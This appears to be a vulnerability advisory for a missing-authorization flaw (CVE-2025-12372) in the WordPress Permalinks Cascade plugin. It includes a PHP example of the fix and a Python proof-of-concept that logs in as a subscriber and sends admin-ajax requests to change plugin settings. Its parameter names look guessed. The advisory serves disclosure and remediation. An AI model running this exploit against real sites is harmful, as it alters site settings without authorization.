Security Vulnerability Report
CVE-2025-12372 CVSS 4.3 MEDIUM

Published: 2025-11-18 09:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Permalinks Cascade plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.2. This is due to the plugin not properly verifying that a user is authorized to perform an action in the handleTPCAdminAjaxRequest function. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized administrative actions such as enabling or disabling automatic pinging settings and modifying page exclusion settings.
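The remediation pattern for this class of bug (CWE-862 in an admin-ajax handler), as an added illustration that is not the plugin's own code: a WordPress AJAX handler that verifies a nonce and a capability before touching any setting. The hook, nonce and option names (tpc_demo_*) are hypothetical placeholders.

```php
<?php
// Added illustration of a hardened WordPress admin-ajax handler.
// Not the Permalinks Cascade plugin's code; action, nonce and option
// names (tpc_demo_*) are hypothetical placeholders.

add_action( 'wp_ajax_tpc_demo_toggle_autoping', 'tpc_demo_handle_toggle_autoping' );

function tpc_demo_handle_toggle_autoping() {
    // 1. CSRF protection: the request must carry a nonce issued to this
    //    user for this specific action. With the default third argument
    //    check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'tpc_demo_toggle_autoping', 'nonce' );

    // 2. Authorization: any logged-in user (subscriber included) can reach
    //    a wp_ajax_* hook, so being authenticated is not enough. Changing
    //    plugin settings requires an administrator capability. This is the
    //    check whose absence the CVE description refers to.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 3. Input validation: accept only the two states the setting can take.
    $status = isset( $_POST['autoping_status'] ) ? (int) $_POST['autoping_status'] : -1;
    if ( 0 !== $status && 1 !== $status ) {
        wp_send_json_error( array( 'message' => 'Invalid status.' ), 400 );
    }

    update_option( 'tpc_demo_autoping_enabled', $status );
    wp_send_json_success( array( 'autoping_enabled' => $status ) );
}

// The nonce is handed to the admin page's script, which sends it back
// as the 'nonce' POST field checked above.
function tpc_demo_enqueue_admin_script() {
    wp_enqueue_script( 'tpc-demo-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'tpc-demo-admin', 'tpcDemo', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'tpc_demo_toggle_autoping' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'tpc_demo_enqueue_admin_script' );
```

The capability check is the one that closes the reported issue; the nonce alone would not, since a subscriber can obtain a nonce for any action the page exposes to them.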

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Permalinks Cascade plugin <= 2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12372 PoC - Permalinks Cascade Plugin Unauthorized Access
# Target: WordPress site with Permalinks Cascade plugin <= 2.2


def exploit_unauthorized_access(target_url, username, password, action='disable_autoping'):
    """
    Exploit missing authorization in handleTPCAdminAjaxRequest function

    Args:
        target_url: Base URL of WordPress site
        username: Valid subscriber-level username
        password: Password for the user
        action: Admin action to perform (disable_autoping, enable_autoping, etc.)
    """
    # Setup session
    session = requests.Session()

    # Login as subscriber
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }

    print(f"[*] Logging in as subscriber: {username}")
    response = session.post(login_url, data=login_data, allow_redirects=True)

    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed!")
        return False

    print("[+] Login successful!")

    # Prepare AJAX request to exploit the vulnerability
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Different actions that can be performed unauthorized
    actions = {
        'disable_autoping': {'tpc_action': 'toggle_autoping', 'autoping_status': '0'},
        'enable_autoping': {'tpc_action': 'toggle_autoping', 'autoping_status': '1'},
        'modify_exclusions': {'tpc_action': 'update_exclusions', 'excluded_pages': '1,2,3'}
    }

    if action not in actions:
        print(f"[-] Unknown action: {action}")
        return False

    # Construct exploit payload
    exploit_data = {
        'action': 'handleTPCAdminAjaxRequest',
        **actions[action]
    }

    print(f"[*] Sending exploit request: {action}")
    response = session.post(ajax_url, data=exploit_data)

    if response.status_code == 200:
        print("[+] Exploit sent successfully!")
        print(f"[*] Response: {response.text[:200]}")
        return True
    else:
        print(f"[-] Exploit failed with status: {response.status_code}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> [action]")
        print("Actions: disable_autoping, enable_autoping, modify_exclusions")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    act = sys.argv[4] if len(sys.argv) > 4 else 'disable_autoping'

    exploit_unauthorized_access(target, user, pwd, act)
```

References

Weakness: CWE-862 (Missing Authorization)
Record status: Deferred
https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/admin/admin-controller.class.php#L109
https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/includes/core.class.php#L36
https://www.wordfence.com/threat-intel/vulnerabilities/id/c08d420d-d521-4215-9ef7-b5d1c44a19d3?source=cve